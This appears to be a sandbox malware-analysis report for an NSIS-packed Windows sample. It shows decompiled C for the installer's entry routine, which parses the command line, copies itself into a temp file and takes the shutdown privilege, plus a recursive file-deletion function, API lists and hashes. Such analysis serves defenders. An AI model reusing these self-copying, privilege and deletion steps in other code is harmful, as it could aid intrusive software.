          control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 132->109 140->129
          C-Code - Quality: 78%
          			_entry_() {
          				WCHAR* _v8;
          				signed int _v12;
          				void* _v16;
          				signed int _v20;
          				int _v24;
          				int _v28;
          				struct _TOKEN_PRIVILEGES _v40;
          				signed char _v42;
          				int _v44;
          				signed int _v48;
          				intOrPtr _v278;
          				signed short _v310;
          				struct _OSVERSIONINFOW _v324;
          				struct _SHFILEINFOW _v1016;
          				intOrPtr* _t88;
          				intOrPtr* _t94;
          				void _t97;
          				void* _t116;
          				WCHAR* _t118;
          				signed int _t119;
          				intOrPtr* _t123;
          				void* _t137;
          				void* _t143;
          				void* _t148;
          				void* _t152;
          				void* _t157;
          				signed int _t167;
          				void* _t170;
          				void* _t175;
          				intOrPtr _t177;
          				intOrPtr _t178;
          				intOrPtr* _t179;
          				int _t188;
          				void* _t189;
          				void* _t198;
          				signed int _t204;
          				signed int _t209;
          				signed int _t214;
          				int* _t218;
          				signed int _t226;
          				signed int _t229;
          				CHAR* _t231;
          				signed int _t233;
          				WCHAR* _t234;
          
          				0x7b3000 = 0x20;
          				_t188 = 0;
          				_v24 = 0;
          				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
          				_v20 = 0;
          				SetErrorMode(0x8001); // executed
          				_v324.szCSDVersion = 0;
          				_v48 = 0;
          				_v44 = 0;
          				_v324.dwOSVersionInfoSize = 0x11c;
          				if(GetVersionExW( &_v324) == 0) {
          					_v324.dwOSVersionInfoSize = 0x114;
          					GetVersionExW( &_v324);
          					asm("sbb eax, eax");
          					_v42 = 4;
          					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
          				}
          				if(_v324.dwMajorVersion < 0xa) {
          					_v310 = _v310 & 0x00000000;
          				}
          				 *0x7a8b58 = _v324.dwBuildNumber;
          				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
          				if( *0x7a8b5e != 0x600) {
          					_t179 = E00406A3B(_t188);
          					if(_t179 != _t188) {
          						 *_t179(0xc00);
          					}
          				}
          				_t231 = "UXTHEME";
          				do {
          					E004069CB(_t231); // executed
          					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
          				} while ( *_t231 != 0);
          				E00406A3B(0xb);
          				 *0x7a8aa4 = E00406A3B(9);
          				_t88 = E00406A3B(7);
          				if(_t88 != _t188) {
          					_t88 =  *_t88(0x1e);
          					if(_t88 != 0) {
          						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
          					}
          				}
          				__imp__#17();
          				__imp__OleInitialize(_t188); // executed
          				 *0x7a8b60 = _t88;
          				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
          				E0040666E(0x7a7aa0, L"NSIS Error");
          				E0040666E(0x7b3000, GetCommandLineW());
          				_t94 = 0x7b3000;
          				_t233 = 0x22;
          				 *0x7a8aa0 = 0x400000;
          				if( *0x7b3000 == _t233) {
          					_t94 = 0x7b3002;
          				}
          				_t198 = CharNextW(E00405F6A(_t94, 0x7b3000));
          				_v16 = _t198;
          				while(1) {
          					_t97 =  *_t198;
          					_t251 = _t97 - _t188;
          					if(_t97 == _t188) {
          						break;
          					}
          					_t209 = 0x20;
          					__eflags = _t97 - _t209;
          					if(_t97 != _t209) {
          						L17:
          						__eflags =  *_t198 - _t233;
          						_v12 = _t209;
          						if( *_t198 == _t233) {
          							_v12 = _t233;
          							_t198 = _t198 + 2;
          							__eflags = _t198;
          						}
          						__eflags =  *_t198 - 0x2f;
          						if( *_t198 != 0x2f) {
          							L32:
          							_t198 = E00405F6A(_t198, _v12);
          							__eflags =  *_t198 - _t233;
          							if(__eflags == 0) {
          								_t198 = _t198 + 2;
          								__eflags = _t198;
          							}
          							continue;
          						} else {
          							_t198 = _t198 + 2;
          							__eflags =  *_t198 - 0x53;
          							if( *_t198 != 0x53) {
          								L24:
          								asm("cdq");
          								asm("cdq");
          								_t214 = L"NCRC" & 0x0000ffff;
          								asm("cdq");
          								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
          								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
          								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
          									L29:
          									asm("cdq");
          									asm("cdq");
          									_t209 = L" /D=" & 0x0000ffff;
          									asm("cdq");
          									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
          									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
          									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
          										L31:
          										_t233 = 0x22;
          										goto L32;
          									}
          									__eflags =  *_t198 - _t229;
          									if( *_t198 == _t229) {
          										 *(_t198 - 4) = _t188;
          										__eflags = _t198;
          										E0040666E(0x7b3800, _t198);
          										L37:
          										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
          										GetTempPathW(0x400, _t234);
          										_t116 = E00403615(_t198, _t251);
          										_t252 = _t116;
          										if(_t116 != 0) {
          											L40:
          											DeleteFileW(L"1033"); // executed
          											_t118 = E004030D0(_t254, _v20); // executed
          											_v8 = _t118;
          											if(_t118 != _t188) {
          												L68:
          												ExitProcess(); // executed
          												__imp__OleUninitialize(); // executed
          												if(_v8 == _t188) {
          													if( *0x7a8b34 == _t188) {
          														L77:
          														_t119 =  *0x7a8b4c;
          														if(_t119 != 0xffffffff) {
          															_v24 = _t119;
          														}
          														ExitProcess(_v24);
          													}
          													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
          														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
          														_v40.PrivilegeCount = 1;
          														_v28 = 2;
          														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
          													}
          													_t123 = E00406A3B(4);
          													if(_t123 == _t188) {
          														L75:
          														if(ExitWindowsEx(2, 0x80040002) != 0) {
          															goto L77;
          														}
          														goto L76;
          													} else {
          														_push(0x80040002);
          														_push(0x25);
          														_push(_t188);
          														_push(_t188);
          														_push(_t188);
          														if( *_t123() == 0) {
          															L76:
          															E0040140B(9);
          															goto L77;
          														}
          														goto L75;
          													}
          												}
          												E00405CCE(_v8, 0x200010);
          												ExitProcess(2);
          											}
          											if( *0x7a8abc == _t188) {
          												L51:
          												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
          												_v24 = E00403D1D(_t264);
          												goto L68;
          											}
          											_t218 = E00405F6A(0x7b3000, _t188);
          											if(_t218 < 0x7b3000) {
          												L48:
          												_t263 = _t218 - 0x7b3000;
          												_v8 = L"Error launching installer";
          												if(_t218 < 0x7b3000) {
          													_t189 = E00405C39(__eflags);
          													lstrcatW(_t234, L"~nsu");
          													__eflags = _t189;
          													if(_t189 != 0) {
          														lstrcatW(_t234, "A");
          													}
          													lstrcatW(_t234, L".tmp");
          													_t137 = lstrcmpiW(_t234, 0x7b4800);
          													__eflags = _t137;
          													if(_t137 == 0) {
          														L67:
          														_t188 = 0;
          														__eflags = 0;
          														goto L68;
          													} else {
          														__eflags = _t189;
          														_push(_t234);
          														if(_t189 == 0) {
          															E00405C1C();
          														} else {
          															E00405B9F();
          														}
          														SetCurrentDirectoryW(_t234);
          														__eflags =  *0x7b3800;
          														if( *0x7b3800 == 0) {
          															E0040666E(0x7b3800, 0x7b4800);
          														}
          														E0040666E(0x7a9000, _v16);
          														_t201 = "A" & 0x0000ffff;
          														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
          														__eflags = _t143;
          														_v12 = 0x1a;
          														 *0x7a9800 = _t143;
          														do {
          															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
          															DeleteFileW(0x79f748);
          															__eflags = _v8;
          															if(_v8 != 0) {
          																_t148 = CopyFileW(0x7b6800, 0x79f748, 1);
          																__eflags = _t148;
          																if(_t148 != 0) {
          																	E0040642E(_t201, 0x79f748, 0);
          																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
          																	_t152 = E00405C51(0x79f748);
          																	__eflags = _t152;
          																	if(_t152 != 0) {
          																		CloseHandle(_t152);
          																		_v8 = 0;
          																	}
          																}
          															}
          															 *0x7a9800 =  *0x7a9800 + 1;
          															_t61 =  &_v12;
          															 *_t61 = _v12 - 1;
          															__eflags =  *_t61;
          														} while ( *_t61 != 0);
          														E0040642E(_t201, _t234, 0);
          														goto L67;
          													}
          												}
          												 *_t218 = _t188;
          												_t221 =  &(_t218[2]);
          												_t157 = E00406045(_t263,  &(_t218[2]));
          												_t264 = _t157;
          												if(_t157 == 0) {
          													goto L68;
          												}
          												E0040666E(0x7b3800, _t221);
          												E0040666E(0x7b4000, _t221);
          												_v8 = _t188;
          												goto L51;
          											}
          											asm("cdq");
          											asm("cdq");
          											asm("cdq");
          											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
          											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
          											while( *_t218 != _t204 || _t218[1] != _t167) {
          												_t218 = _t218;
          												if(_t218 >= 0x7b3000) {
          													continue;
          												}
          												break;
          											}
          											_t188 = 0;
          											goto L48;
          										}
          										GetWindowsDirectoryW(_t234, 0x3fb);
          										lstrcatW(_t234, L"\\Temp");
          										_t170 = E00403615(_t198, _t252);
          										_t253 = _t170;
          										if(_t170 != 0) {
          											goto L40;
          										}
          										GetTempPathW(0x3fc, _t234);
          										lstrcatW(_t234, L"Low");
          										SetEnvironmentVariableW(L"TEMP", _t234);
          										SetEnvironmentVariableW(L"TMP", _t234);
          										_t175 = E00403615(_t198, _t253);
          										_t254 = _t175;
          										if(_t175 == 0) {
          											goto L68;
          										}
          										goto L40;
          									}
          									goto L31;
          								}
          								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
          								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
          									goto L29;
          								}
          								_t177 =  *((intOrPtr*)(_t198 + 8));
          								__eflags = _t177 - 0x20;
          								if(_t177 == 0x20) {
          									L28:
          									_t36 =  &_v20;
          									 *_t36 = _v20 | 0x00000004;
          									__eflags =  *_t36;
          									goto L29;
          								}
          								__eflags = _t177 - _t188;
          								if(_t177 != _t188) {
          									goto L29;
          								}
          								goto L28;
          							}
          							_t178 =  *((intOrPtr*)(_t198 + 2));
          							__eflags = _t178 - _t209;
          							if(_t178 == _t209) {
          								L23:
          								 *0x7a8b40 = 1;
          								goto L24;
          							}
          							__eflags = _t178 - _t188;
          							if(_t178 != _t188) {
          								goto L24;
          							}
          							goto L23;
          						}
          					} else {
          						goto L16;
          					}
          					do {
          						L16:
          						_t198 = _t198 + 2;
          						__eflags =  *_t198 - _t209;
          					} while ( *_t198 == _t209);
          					goto L17;
          				}
          				goto L37;
          			}















































          0x00403654
          0x00403655
          0x0040365c
          0x0040365f
          0x00403666
          0x00403669
          0x0040367c
          0x00403682
          0x00403685
          0x00403688
          0x00403696
          0x0040369e
          0x004036a9
          0x004036c2
          0x004036c4
          0x004036cc
          0x004036cc
          0x004036d7
          0x004036d9
          0x004036d9
          0x004036ee
          0x00403713
          0x00403721
          0x00403724
          0x0040372b
          0x00403732
          0x00403732
          0x0040372b
          0x00403734
          0x00403739
          0x0040373a
          0x00403746
          0x0040374a
          0x00403751
          0x0040375f
          0x00403764
          0x0040376b
          0x0040376f
          0x00403773
          0x00403775
          0x00403775
          0x00403773
          0x0040377c
          0x00403783
          0x00403789
          0x004037a1
          0x004037b1
          0x004037c3
          0x004037ca
          0x004037cc
          0x004037cd
          0x004037de
          0x004037e2
          0x004037e2
          0x004037f5
          0x004037f7
          0x004038f1
          0x004038f1
          0x004038f4
          0x004038f7
          0x00000000
          0x00000000
          0x00403801
          0x00403802
          0x00403805
          0x0040380e
          0x0040380e
          0x00403811
          0x00403814
          0x00403817
          0x0040381a
          0x0040381a
          0x0040381a
          0x0040381b
          0x0040381f
          0x004038df
          0x004038e8
          0x004038ea
          0x004038ed
          0x004038f0
          0x004038f0
          0x004038f0
          0x00000000
          0x00403825
          0x00403826
          0x00403827
          0x0040382b
          0x00403845
          0x0040384c
          0x0040385f
          0x00403860
          0x00403875
          0x0040387a
          0x0040387c
          0x0040387e
          0x0040389a
          0x004038a1
          0x004038b4
          0x004038b5
          0x004038ca
          0x004038d0
          0x004038d2
          0x004038d4
          0x004038dc
          0x004038de
          0x00000000
          0x004038de
          0x004038d8
          0x004038da
          0x004038ff
          0x00403903
          0x0040390c
          0x00403911
          0x00403917
          0x00403922
          0x00403924
          0x00403929
          0x0040392b
          0x00403983
          0x00403988
          0x00403991
          0x00403998
          0x0040399b
          0x00403b72
          0x00403b72
          0x00403b77
          0x00403b80
          0x00403b9d
          0x00403c15
          0x00403c15
          0x00403c1d
          0x00403c1f
          0x00403c1f
          0x00403c25
          0x00403c25
          0x00403bb4
          0x00403bc0
          0x00403bd1
          0x00403bd8
          0x00403bdf
          0x00403bdf
          0x00403be7
          0x00403bf3
          0x00403c01
          0x00403c0c
          0x00000000
          0x00000000
          0x00000000
          0x00403bf5
          0x00403bf5
          0x00403bf6
          0x00403bf8
          0x00403bf9
          0x00403bfa
          0x00403bff
          0x00403c0e
          0x00403c10
          0x00000000
          0x00403c10
          0x00000000
          0x00403bff
          0x00403bf3
          0x00403b8a
          0x00403b91
          0x00403b91
          0x004039a7
          0x00403a4e
          0x00403a4e
          0x00403a5a
          0x00000000
          0x00403a5a
          0x004039b8
          0x004039c0
          0x00403a12
          0x00403a12
          0x00403a18
          0x00403a1f
          0x00403a6d
          0x00403a6f
          0x00403a74
          0x00403a76
          0x00403a7e
          0x00403a7e
          0x00403a89
          0x00403a95
          0x00403a9b
          0x00403a9d
          0x00403b70
          0x00403b70
          0x00403b70
          0x00000000
          0x00403aa3
          0x00403aa3
          0x00403aa5
          0x00403aa6
          0x00403aaf
          0x00403aa8
          0x00403aa8
          0x00403aa8
          0x00403ab5
          0x00403abd
          0x00403ac4
          0x00403acc
          0x00403acc
          0x00403ad9
          0x00403ae5
          0x00403aef
          0x00403aef
          0x00403af1
          0x00403af8
          0x00403b02
          0x00403b0e
          0x00403b14
          0x00403b1a
          0x00403b1d
          0x00403b27
          0x00403b2d
          0x00403b2f
          0x00403b33
          0x00403b44
          0x00403b4a
          0x00403b4f
          0x00403b51
          0x00403b54
          0x00403b5a
          0x00403b5a
          0x00403b51
          0x00403b2f
          0x00403b5d
          0x00403b64
          0x00403b64
          0x00403b64
          0x00403b64
          0x00403b6b
          0x00000000
          0x00403b6b
          0x00403a9d
          0x00403a21
          0x00403a24
          0x00403a28
          0x00403a2d
          0x00403a2f
          0x00000000
          0x00000000
          0x00403a3b
          0x00403a46
          0x00403a4b
          0x00000000
          0x00403a4b
          0x004039c9
          0x004039e1
          0x004039f2
          0x004039f3
          0x004039f7
          0x004039f9
          0x00403a07
          0x00403a0e
          0x00000000
          0x00000000
          0x00000000
          0x00403a0e
          0x00403a10
          0x00000000
          0x00403a10
          0x00403933
          0x0040393f
          0x00403944
          0x00403949
          0x0040394b
          0x00000000
          0x00000000
          0x00403953
          0x0040395b
          0x0040396c
          0x00403974
          0x00403976
          0x0040397b
          0x0040397d
          0x00000000
          0x00000000
          0x00000000
          0x0040397d
          0x00000000
          0x004038da
          0x00403883
          0x00403885
          0x00000000
          0x00000000
          0x00403887
          0x0040388b
          0x0040388f
          0x00403896
          0x00403896
          0x00403896
          0x00403896
          0x00000000
          0x00403896
          0x00403891
          0x00403894
          0x00000000
          0x00000000
          0x00000000
          0x00403894
          0x0040382d
          0x00403831
          0x00403834
          0x0040383b
          0x0040383b
          0x00000000
          0x0040383b
          0x00403836
          0x00403839
          0x00000000
          0x00000000
          0x00000000
          0x00403839
          0x00000000
          0x00000000
          0x00000000
          0x00403807
          0x00403807
          0x00403808
          0x00403809
          0x00403809
          0x00000000
          0x00403807
          0x00000000

          APIs
          • SetErrorMode.KERNELBASE(00008001), ref: 00403669
          • GetVersionExW.KERNEL32(?), ref: 00403692
          • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
          • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
          • OleInitialize.OLE32(00000000), ref: 00403783
          • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
          • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
          • CharNextW.USER32(00000000), ref: 004037EF
          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403922
          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
          • lstrcatW.KERNEL32 ref: 0040393F
          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403953
          • lstrcatW.KERNEL32 ref: 0040395B
          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
          • DeleteFileW.KERNELBASE(1033), ref: 00403988
          • lstrcatW.KERNEL32 ref: 00403A6F
          • lstrcatW.KERNEL32 ref: 00403A7E
            • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
          • lstrcatW.KERNEL32 ref: 00403A89
          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403A95
          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
          • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
          • CopyFileW.KERNEL32 ref: 00403B27
          • CloseHandle.KERNEL32(00000000), ref: 00403B54
          • ExitProcess.KERNELBASE(?), ref: 00403B72
          • OleUninitialize.OLE32 ref: 00403B77
          • ExitProcess.KERNEL32 ref: 00403B91
          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
          • ExitProcess.KERNEL32 ref: 00403C25
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
          • API String ID: 2292928366-4036104658
          • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
          • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
          • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
          • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 391 405d7a-405da0 call 406045 394 405da2-405db4 DeleteFileW 391->394 395 405db9-405dc0 391->395 396 405f36-405f3a 394->396 397 405dc2-405dc4 395->397 398 405dd3-405de3 call 40666e 395->398 400 405ee4-405ee9 397->400 401 405dca-405dcd 397->401 404 405df2-405df3 call 405f89 398->404 405 405de5-405df0 lstrcatW 398->405 400->396 403 405eeb-405eee 400->403 401->398 401->400 406 405ef0-405ef6 403->406 407 405ef8-405f00 call 4069a4 403->407 408 405df8-405dfc 404->408 405->408 406->396 407->396 415 405f02-405f16 call 405f3d call 405d32 407->415 411 405e08-405e0e lstrcatW 408->411 412 405dfe-405e06 408->412 414 405e13-405e2f lstrlenW FindFirstFileW 411->414 412->411 412->414 416 405e35-405e3d 414->416 417 405ed9-405edd 414->417 433 405f18-405f1b 415->433 434 405f2e-405f31 call 4056d0 415->434 420 405e5d-405e71 call 40666e 416->420 421 405e3f-405e47 416->421 417->400 419 405edf 417->419 419->400 431 405e73-405e7b 420->431 432 405e88-405e93 call 405d32 420->432 423 405e49-405e51 421->423 424 405ebc-405ecc FindNextFileW 421->424 423->420 428 405e53-405e5b 423->428 424->416 427 405ed2-405ed3 FindClose 424->427 427->417 428->420 428->424 431->424 436 405e7d-405e86 call 405d7a 431->436 444 405eb4-405eb7 call 4056d0 432->444 445 405e95-405e98 432->445 433->406 435 405f1d-405f2c call 4056d0 call 40642e 433->435 434->396 435->396 436->424 444->424 447 405e9a-405eaa call 4056d0 call 40642e 445->447 448 405eac-405eb2 445->448 447->424 448->424
          C-Code - Quality: 98%
          			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
          				signed int _v8;
          				signed int _v12;
          				short _v556;
          				short _v558;
          				struct _WIN32_FIND_DATAW _v604;
          				signed int _t38;
          				signed int _t52;
          				signed int _t55;
          				signed int _t62;
          				void* _t64;
          				signed char _t65;
          				WCHAR* _t66;
          				void* _t67;
          				WCHAR* _t68;
          				void* _t70;
          
          				_t65 = _a8;
          				_t68 = _a4;
          				_v8 = _t65 & 0x00000004;
          				_t38 = E00406045(__eflags, _t68);
          				_v12 = _t38;
          				if((_t65 & 0x00000008) != 0) {
          					_t62 = DeleteFileW(_t68); // executed
          					asm("sbb eax, eax");
          					_t64 =  ~_t62 + 1;
          					 *0x7a8b28 =  *0x7a8b28 + _t64;
          					return _t64;
          				}
          				_a4 = _t65;
          				_t8 =  &_a4;
          				 *_t8 = _a4 & 0x00000001;
          				__eflags =  *_t8;
          				if( *_t8 == 0) {
          					L5:
          					E0040666E(0x7a3f90, _t68);
          					__eflags = _a4;
          					if(_a4 == 0) {
          						E00405F89(_t68);
          					} else {
          						lstrcatW(0x7a3f90, L"\\*.*");
          					}
          					__eflags =  *_t68;
          					if( *_t68 != 0) {
          						L10:
          						lstrcatW(_t68, 0x40a014);
          						L11:
          						_t66 =  &(_t68[lstrlenW(_t68)]);
          						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
          						_t70 = _t38;
          						__eflags = _t70 - 0xffffffff;
          						if(_t70 == 0xffffffff) {
          							L26:
          							__eflags = _a4;
          							if(_a4 != 0) {
          								_t30 = _t66 - 2;
          								 *_t30 =  *(_t66 - 2) & 0x00000000;
          								__eflags =  *_t30;
          							}
          							goto L28;
          						} else {
          							goto L12;
          						}
          						do {
          							L12:
          							__eflags = _v604.cFileName - 0x2e;
          							if(_v604.cFileName != 0x2e) {
          								L16:
          								E0040666E(_t66,  &(_v604.cFileName));
          								__eflags = _v604.dwFileAttributes & 0x00000010;
          								if(__eflags == 0) {
          									_t52 = E00405D32(__eflags, _t68, _v8);
          									__eflags = _t52;
          									if(_t52 != 0) {
          										E004056D0(0xfffffff2, _t68);
          									} else {
          										__eflags = _v8 - _t52;
          										if(_v8 == _t52) {
          											 *0x7a8b28 =  *0x7a8b28 + 1;
          										} else {
          											E004056D0(0xfffffff1, _t68);
          											E0040642E(_t67, _t68, 0);
          										}
          									}
          								} else {
          									__eflags = (_a8 & 0x00000003) - 3;
          									if(__eflags == 0) {
          										E00405D7A(__eflags, _t68, _a8);
          									}
          								}
          								goto L24;
          							}
          							__eflags = _v558;
          							if(_v558 == 0) {
          								goto L24;
          							}
          							__eflags = _v558 - 0x2e;
          							if(_v558 != 0x2e) {
          								goto L16;
          							}
          							__eflags = _v556;
          							if(_v556 == 0) {
          								goto L24;
          							}
          							goto L16;
          							L24:
          							_t55 = FindNextFileW(_t70,  &_v604); // executed
          							__eflags = _t55;
          						} while (_t55 != 0);
          						_t38 = FindClose(_t70); // executed
          						goto L26;
          					}
